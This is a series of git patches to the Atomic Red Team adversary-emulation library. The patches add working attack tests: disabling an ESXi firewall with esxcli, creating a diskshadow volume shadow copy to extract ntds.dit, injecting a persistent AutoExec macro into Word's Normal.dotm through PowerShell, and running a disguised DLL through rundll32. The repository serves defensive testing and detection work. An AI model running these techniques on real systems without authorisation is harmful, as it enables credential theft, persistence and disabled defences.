+```cmd + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Check if plink is available. +##### Check Prereq Commands: +```powershell +if (Test-Path "#{plink_file}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +``` + +
\ No newline at end of file diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index 4e0e582201..687398abe6 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -439,3 +439,42 @@ atomic_tests: netsh firewall set opmode mode=enable >nul 2>&1 name: command_prompt elevation_required: true +- name: ESXi - Disable Firewall via Esxcli + auto_generated_guid: 8710d396-96e5-11ee-b9d1-0242ac120002 + description: | + Adversaries may disable the ESXI firewall via ESXCLI + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: 'PathToAtomicsFolder\..\ExternalPayloads\plink.exe' + username: + description: username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: | + The plink executable must be found in the ExternalPayloads folder. + prereq_command: | + if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: | + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_disable_firewall.txt + cleanup_command: | + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\..\atomics\T1562.004\src\esxi_enable_firewall.txt + name: command_prompt + elevation_required: false \ No newline at end of file diff --git a/atomics/T1562.004/src/esxi_disable_firewall.txt b/atomics/T1562.004/src/esxi_disable_firewall.txt new file mode 100644 index 0000000000..b5b1bfb1ef --- /dev/null +++ b/atomics/T1562.004/src/esxi_disable_firewall.txt @@ -0,0 +1 @@ +esxcli network firewall set --enabled false diff --git a/atomics/T1562.004/src/esxi_enable_firewall.txt b/atomics/T1562.004/src/esxi_enable_firewall.txt new file mode 100644 index 0000000000..277d540e07 --- /dev/null +++ b/atomics/T1562.004/src/esxi_enable_firewall.txt @@ -0,0 +1 @@ +esxcli network firewall set --enabled true \ No newline at end of file From 1eed144a1e85362f0afb14ab61996e16847ed805 Mon Sep 17 00:00:00 2001 From: publish bot Date: Thu, 22 Feb 2024 19:49:03 +0000 Subject: [PATCH 09/41] updating atomics count in README.md [ci skip] --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1569ca6fee..8dfb9c2443 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1515-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1518-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use From df24b972a9698627a1de4586b294d3a3bfe12c77 Mon Sep 17 00:00:00 2001 From: jianni20 <11943867+jianni20@users.noreply.github.com> Date: Thu, 22 Feb 2024 15:06:29 -0500 Subject: [PATCH 10/41] New test: T1003.003 - Create Volume Shadow Copy with diskshadow (#2690) * New test - Create Volume Shadow Copy with diskshadow * Fix typos * fix indentation * Update T1003.003.yaml * Update T1003.003.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1003.003/T1003.003.yaml | 18 ++++++++++++++++++ atomics/T1003.003/src/diskshadow.txt | 5 +++++ 2 files changed, 23 insertions(+) create mode 100644 atomics/T1003.003/src/diskshadow.txt diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml index 02bb903f95..4a82ae2844 100644 --- a/atomics/T1003.003/T1003.003.yaml +++ b/atomics/T1003.003/T1003.003.yaml @@ -242,3 +242,21 @@ atomic_tests: mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 name: command_prompt elevation_required: true + +- name: Create Volume Shadow Copy with diskshadow + description: | + This test is intended to be run on a domain controller + An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit + supported_platforms: + - windows + input_arguments: + filename: + description: Location of the script + type: Path + default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt + executor: + command: | + mkdir c:\exfil + diskshadow.exe /s #{filename} + name: command_prompt + elevation_required: true diff --git a/atomics/T1003.003/src/diskshadow.txt b/atomics/T1003.003/src/diskshadow.txt new file mode 100644 index 0000000000..9485115ca0 --- /dev/null +++ b/atomics/T1003.003/src/diskshadow.txt @@ -0,0 +1,5 @@ +set context persistent nowriters +set metadata C:\exfil\metadata.cab +add volume c: alias loot +create +expose %loot% s: \ No newline at end of file From 9628658dbaec4b0897edc7f354dcbc0024fca3aa Mon Sep 17 00:00:00 2001 From: publish bot Date: Thu, 22 Feb 2024 20:07:05 +0000 Subject: [PATCH 11/41] updating atomics count in README.md [ci skip] --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 8dfb9c2443..e2e2354a09 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1518-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1519-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use From 0bd9b1acc11e7d0bde639cd3ab54432be6236e5e Mon Sep 17 00:00:00 2001 From: Daniel Cortez <32076062+DefenderDaniel@users.noreply.github.com> Date: Thu, 22 Feb 2024 12:56:04 -0800 Subject: [PATCH 12/41] New Test T1137.001 - 'Office Application Startup: Office Template Macros.' (#2694) * Create T1137.001.yml Created new Directory and new test for T1137.001 * Rename T1137.001.yml to T1137.001.yaml * Update T1137.001.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1137.001/T1137.001.yaml | 145 +++++++++++++++++++++++++++++++ 1 file changed, 145 insertions(+) create mode 100644 atomics/T1137.001/T1137.001.yaml diff --git a/atomics/T1137.001/T1137.001.yaml b/atomics/T1137.001/T1137.001.yaml new file mode 100644 index 0000000000..2d74695135 --- /dev/null +++ b/atomics/T1137.001/T1137.001.yaml @@ -0,0 +1,145 @@ +attack_technique: T1137.001 +display_name: 'Office Application Startup: Office Template Macros.' +atomic_tests: +- name: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell + description: | + Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening. + supported_platforms: + - windows + dependencies: + - description: | + Microsoft Word must be installed + prereq_command: | + try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 + } catch { exit 1 } + get_prereq_command: | + Write-Host "You will need to install Microsoft Word manually to meet this requirement" + executor: + name: powershell + elevation_required: true + command: | + # Registry setting to "Trust access to the VBA project object model" in Word + $registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security" + $registryValue = "AccessVBOM" + $registryData = "1" + # The path where a flag text file will be created if Registry setting did not already exist or if it was set to 0 + $flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt" + $flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt" + # Get the value of the Key/Value pair + $value = (Get-ItemProperty -Path $registryKey -Name $registryValue -ErrorAction SilentlyContinue).$registryValue + # Logical operation to: if the value of the key/value is 1, do nothing - + # if the value is 0, change it to 1 and create flag1 - + # if it doesn't exist, create the value and flag2 + if ($value -eq "1") + { + Write-Host "The registry value '$registryValue' already exists with the required setting." + } + elseif ($value -eq "0") + { + Write-Host "The registry value was set to 0, temporarily changing to 1." + New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null + echo "flag1" > $flagPath1 + } + else + { + Write-Host "The registry value '$registryValue' does not exist, temporarily creating it." + New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null + echo "flag2" > $flagPath2 + } + Add-Type -AssemblyName Microsoft.Office.Interop.Word + # Define the path of copied normal template for restoral + $copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm" + # Define the path to the normal template + $docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm" + # Create copy of orginal template for restoral + Copy-Item -Path $docPath -Destination $copyPath -Force + # VBA code to be insterted as a Macro + # Will create a scheduled task to open the Calculator at 8:04pm daily + $vbaCode = @" + Sub AutoExec() + Dim applicationPath As String + Dim taskName As String + Dim runTime As String + Dim schTasksCmd As String + applicationPath = "C:\Windows\System32\calc.exe" + taskName = "OpenCalcTask" + runTime = "20:04" + schTasksCmd = "schtasks /create /tn """ & taskName & """ /tr """ & applicationPath & """ /sc daily /st " & runTime & " /f" + Shell "cmd.exe /c " & schTasksCmd, vbNormalFocus + End Sub + "@ + # Create a new instance of Word.Application + $word = New-Object -ComObject Word.Application + # Keep the Word application hidden + $word.Visible = $false + # Open the document + $document = $word.Documents.Open($docPath) + # Access the VBA project of the document + $vbaProject = $document.VBProject + # Add a new module to the VBA project + $newModule = $vbaProject.VBComponents.Add(1) # 1 = vbext_ct_StdModule + # Add the VBA code to the new module + $newModule.CodeModule.AddFromString($vbaCode) + # Run the Macro + $word.run("AutoExec") + # Save and close the document + $document.SaveAs($docPath) + $document.Close() + # Quit Word + $word.Quit() + # Release COM objects + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) | Out-Null + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) | Out-Null + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) | Out-Null + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) | Out-Null + cleanup_command: | + # Registry setting to "Trust access to the VBA project object model" in Word + $registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security" + $registryValue = "AccessVBOM" + $registryData1 = "1" + $registryData0 = "0" + # Defines the path each flag file created depending on the original registry state + $flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt" + $flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt" + # Define the path of copied normal template for restoral + $copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm" + # Define the path to the normal template + $docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm" + # Delete the scheduled task created by the Macro + schtasks /Delete /TN "OpenCalcTask" /F | Out-Null + #Restore the orginal template if the backup copy exists + if (Test-Path $copyPath) + { + #Delete the injected template + Remove-Item -Force $docPath -ErrorAction SilentlyContinue + # Restore the original template + Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction SilentlyContinue + Write-Host "The original template has been restored" + } + else + { + Write-Host "The original template is present" + } + #Restore the original state of the registry key + if (Test-Path $flagPath1) + { + # The value was originally 0, set back to 0 + New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD -Force | Out-Null + Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue + Write-Host "The original registry state has been restored" + } + elseif (Test-Path $flagPath2) + { + #The value did not previously exist, delete the value + Remove-ItemProperty -Path $registryKey -Name $registryValue | Out-Null + Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue | Out-Null + Write-Host "The original registry state has been restored" + } + else + { + # The value was already 1, do nothing + Write-Host "The value $registryValue already existed in $registryKey." + } From b96b30d3949000db84b3a4a37a1364aabb02aa52 Mon Sep 17 00:00:00 2001 From: publish bot Date: Thu, 22 Feb 2024 20:56:39 +0000 Subject: [PATCH 13/41] updating atomics count in README.md [ci skip] --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e2e2354a09..be8ba3c705 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1519-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1520-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use From 1202d62c59cdea6715f581f669c833067fce4d6b Mon Sep 17 00:00:00 2001 From: KillrBunn3 Date: Thu, 22 Feb 2024 16:29:05 -0500 Subject: [PATCH 14/41] New test: T1218.011 Gamarue tradecraft commandline with rundll32 execution (#2678) * New test: T1218.011 Gamarue tradecraft commandline with rundll32 execution * Update T1218.011.yaml * Update T1218.011.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1218.011/T1218.011.yaml | 27 +++++++++++++++++++++++++++ atomics/T1218.011/bin/_WT.init | Bin 0 -> 3584 bytes 2 files changed, 27 insertions(+) create mode 100644 atomics/T1218.011/bin/_WT.init diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 53d7449373..6464ce738d 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -295,3 +295,30 @@ atomic_tests: copy #{exe_to_launch} not_an_scr.scr rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr cleanup_command: del not_an_scr.scr + +- name: Running DLL with .init extension and function + description: | + This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. + DLL created with the AtomicTestHarnesses Portable Executable Builder script. + supported_platforms: + - windows + input_arguments: + dll_file: + description: The DLL file to be called + type: string + default: PathToAtomicsFolder\T1218.011\bin\_WT.init + dll_url: + description: The URL to the DLL file that must be downloaded + type: url + default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init + dependency_executor_name: powershell + dependencies: + - description: The DLL file to be called must exist at the specified location (#{dll_file}) + prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null + Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}" + executor: + command: | + rundll32.exe #{dll_file},krnl + name: command_prompt diff --git a/atomics/T1218.011/bin/_WT.init b/atomics/T1218.011/bin/_WT.init new file mode 100644 index 0000000000000000000000000000000000000000..19114b69cf997560922bfb630492b90a07b056b4 GIT binary patch literal 3584 zcmeHJOKenC82;|GQ_299mWN;jZ&MzXn42~&72<0iOsB0atxOAPL!@_RPTDJX?w#DZ zEsqd`22D&{=*GmjVL^0ZOk9{ij8PV@4D8&vFk$1;xX_Kp1i$~BnGV#z!X1Wx=KSY> zo%27=>rO3vfHnZ_YEx`)Ya6MoaA zll)kdVeiE1e9V5|1|pkHa&5#-N`nn7I`xVhy8z2%au=JFFfB*}H=RiNVYw0OB6VW7 zE^yjqDZL-0t^|oKfh69y8B@o?yd=rw;06)aW`=XdU1`jJ&T)o0)zMw+e!a|rzrmo zHnC$J#BOcrU=v2+U>kRMfcDE+2W9$h951aIz>E$~?t>;AWj1T@;#62!@zu*HUZ}^a z>YP{!Vy~*4Tv)AnzKV(}TJ_4R4kK`5FAPp7-#xFXdM4&tl~!T}ryPe78pFky1|`q; z;tMSs;{(&BH&i)pdYp0tcS%)M5IdQbIIQZ4F%zDn^JV4x$VJMfgGPX}a>(*QIjnGx zU`fSi<^qqLVuZn}ieijLVKwX4)yS~fNGPbdL1ikHVmb0^YtD0_?=u!ARd-BStcRk{ zHTmKoW{Qo7$Ai`ItU`uSdgXjjsfAt;XVtR1>V=V0VXW19IgEU-gjrROG39!}1FU5M z-hS&8&hh*fkwF1-#0yv=UtiQOGRQoIisRwmfHQ&bLgez>yi8)brO!jcMK`mDN;%BQhxK_*(JIYkv}NUdLm2 z<6rW5l`X@KD*h!trR`0;;;$92$*1MNpyyklO%|)fWArWlC2Gk(k9lHKj|-#q6Krgc72g;71;)&6C?$=8e@B5&$9sq-sn{Sji5ujF&D{7zKBw_7Ib|r1AYfrMn zPV{tlCHVC1=-FfS^mbmqc>3h-;XChj4t{s!Q?&(tEYSIDl){~{YdkgPs`n$#2P5?OWD&ggtOJ l3VfVCb86P{0#BaR$MC3Dz&77nH%IK}AJr5d$Nk?c@DI^>dAR@p literal 0 HcmV?d00001 From 2207b5435e1a0fdb37783f53f3bf24f7ce657679 Mon Sep 17 00:00:00 2001 From: publish bot Date: Thu, 22 Feb 2024 21:29:45 +0000 Subject: [PATCH 15/41] updating atomics count in README.md [ci skip] --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index be8ba3c705..38fbbff467 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ # Atomic Red Team -![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1520-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) +![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1521-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master) Atomic Red Team™ is a library of tests mapped to the [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use From bf630ecb29a0e53b35357072c14197a8450165b3 Mon Sep 17 00:00:00 2001 From: Hare Sudhan Date: Sat, 24 Feb 2024 20:14:49 -0500 Subject: [PATCH 16/41] fix guid error (#2696) --- atomics/T1110.001/T1110.001.yaml | 1 - atomics/T1560.001/T1560.001.yaml | 1 - atomics/T1562.004/T1562.004.yaml | 1 - 3 files changed, 3 deletions(-) diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 0ee6159345..ecbd6af463 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -264,7 +264,6 @@ atomic_tests: cleanup_command: | rmuser -y art - name: ESXi - Brute Force Until Account Lockout - auto_generated_guid: f0b443ae-9565-11ee-b9d1-0242ac120002 description: | An adversary may attempt to brute force the password of privilleged account for privilege escalation. In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index 2104fbdd1b..ba22d7dbd6 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml @@ -316,7 +316,6 @@ atomic_tests: name: bash elevation_required: false - name: ESXi - Remove Syslog remote IP - auto_generated_guid: 8241dda4-962e-11ee-b9d1-0242ac120002 description: | An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. supported_platforms: diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index 687398abe6..b60a1fcf68 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -440,7 +440,6 @@ atomic_tests: name: command_prompt elevation_required: true - name: ESXi - Disable Firewall via Esxcli - auto_generated_guid: 8710d396-96e5-11ee-b9d1-0242ac120002 description: | Adversaries may disable the ESXI firewall via ESXCLI supported_platforms: From 21401622e491c1c7c6b7d6837f59bb4464c19860 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Sun, 25 Feb 2024 01:15:31 +0000 Subject: [PATCH 17/41] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1003.003/T1003.003.yaml | 1 + atomics/T1110.001/T1110.001.yaml | 1 + atomics/T1137.001/T1137.001.yaml | 1 + atomics/T1218.011/T1218.011.yaml | 1 + atomics/T1560.001/T1560.001.yaml | 1 + atomics/T1562.004/T1562.004.yaml | 1 + atomics/used_guids.txt | 6 ++++++ 7 files changed, 12 insertions(+) diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml index 4a82ae2844..50f69f6b45 100644 --- a/atomics/T1003.003/T1003.003.yaml +++ b/atomics/T1003.003/T1003.003.yaml @@ -244,6 +244,7 @@ atomic_tests: elevation_required: true - name: Create Volume Shadow Copy with diskshadow + auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7 description: | This test is intended to be run on a domain controller An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index ecbd6af463..3ec16bf7bd 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -264,6 +264,7 @@ atomic_tests: cleanup_command: | rmuser -y art - name: ESXi - Brute Force Until Account Lockout + auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 description: | An adversary may attempt to brute force the password of privilleged account for privilege escalation. In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) diff --git a/atomics/T1137.001/T1137.001.yaml b/atomics/T1137.001/T1137.001.yaml index 2d74695135..1f6b599e4e 100644 --- a/atomics/T1137.001/T1137.001.yaml +++ b/atomics/T1137.001/T1137.001.yaml @@ -2,6 +2,7 @@ attack_technique: T1137.001 display_name: 'Office Application Startup: Office Template Macros.' atomic_tests: - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell + auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8 description: | Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening. supported_platforms: diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 6464ce738d..175f7815d0 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -297,6 +297,7 @@ atomic_tests: cleanup_command: del not_an_scr.scr - name: Running DLL with .init extension and function + auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6 description: | This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. DLL created with the AtomicTestHarnesses Portable Executable Builder script. diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index ba22d7dbd6..e8ec287c9b 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml @@ -316,6 +316,7 @@ atomic_tests: name: bash elevation_required: false - name: ESXi - Remove Syslog remote IP + auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2 description: | An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. supported_platforms: diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index b60a1fcf68..a2ec688f54 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -440,6 +440,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: ESXi - Disable Firewall via Esxcli + auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a description: | Adversaries may disable the ESXI firewall via ESXCLI supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index df2704ee2d..c2bd284c0e 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1561,3 +1561,9 @@ eea0a6c2-84e9-4e8c-a242-ac585d28d0d1 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50 6a5b2a50-d037-4879-bf01-43d4d6cbf73f 4099086c-1470-4223-8085-8186e1ed5948 +b385996c-0e7d-4e27-95a4-aca046b119a7 +ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 +940db09e-80b6-4dd0-8d4d-7764f89b47a8 +2d5029f0-ae20-446f-8811-e7511b58e8b6 +36c62584-d360-41d6-886f-d194654be7c2 +bac8a340-be64-4491-a0cc-0985cb227f5a From ae87c3e1857ba9c48e0405659846d78b751eb58b Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Sun, 25 Feb 2024 01:15:48 +0000 Subject: [PATCH 18/41] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 6 + atomics/Indexes/Indexes-CSV/windows-index.csv | 6 + atomics/Indexes/Indexes-Markdown/index.md | 8 +- .../Indexes-Markdown/office-365-index.md | 2 +- .../Indexes/Indexes-Markdown/windows-index.md | 8 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/azure-ad-index.yaml | 3 +- atomics/Indexes/containers-index.yaml | 3 +- atomics/Indexes/google-workspace-index.yaml | 3 +- atomics/Indexes/iaas-index.yaml | 3 +- atomics/Indexes/iaas_aws-index.yaml | 3 +- atomics/Indexes/iaas_azure-index.yaml | 3 +- atomics/Indexes/iaas_gcp-index.yaml | 3 +- atomics/Indexes/index.yaml | 289 +++++++++++++++++- atomics/Indexes/linux-index.yaml | 3 +- atomics/Indexes/macos-index.yaml | 3 +- atomics/Indexes/office-365-index.yaml | 3 +- atomics/Indexes/saas-index.yaml | 3 +- atomics/Indexes/windows-index.yaml | 289 +++++++++++++++++- atomics/T1003.003/T1003.003.md | 37 +++ atomics/T1110.001/T1110.001.md | 36 ++- atomics/T1137.001/T1137.001.md | 188 ++++++++++++ atomics/T1218.011/T1218.011.md | 50 +++ atomics/T1560.001/T1560.001.md | 83 ++--- atomics/T1562.004/T1562.004.md | 32 +- 28 files changed, 986 insertions(+), 89 deletions(-) create mode 100644 atomics/T1137.001/T1137.001.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 4a2df1ccf1..bdf1bc9041 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- 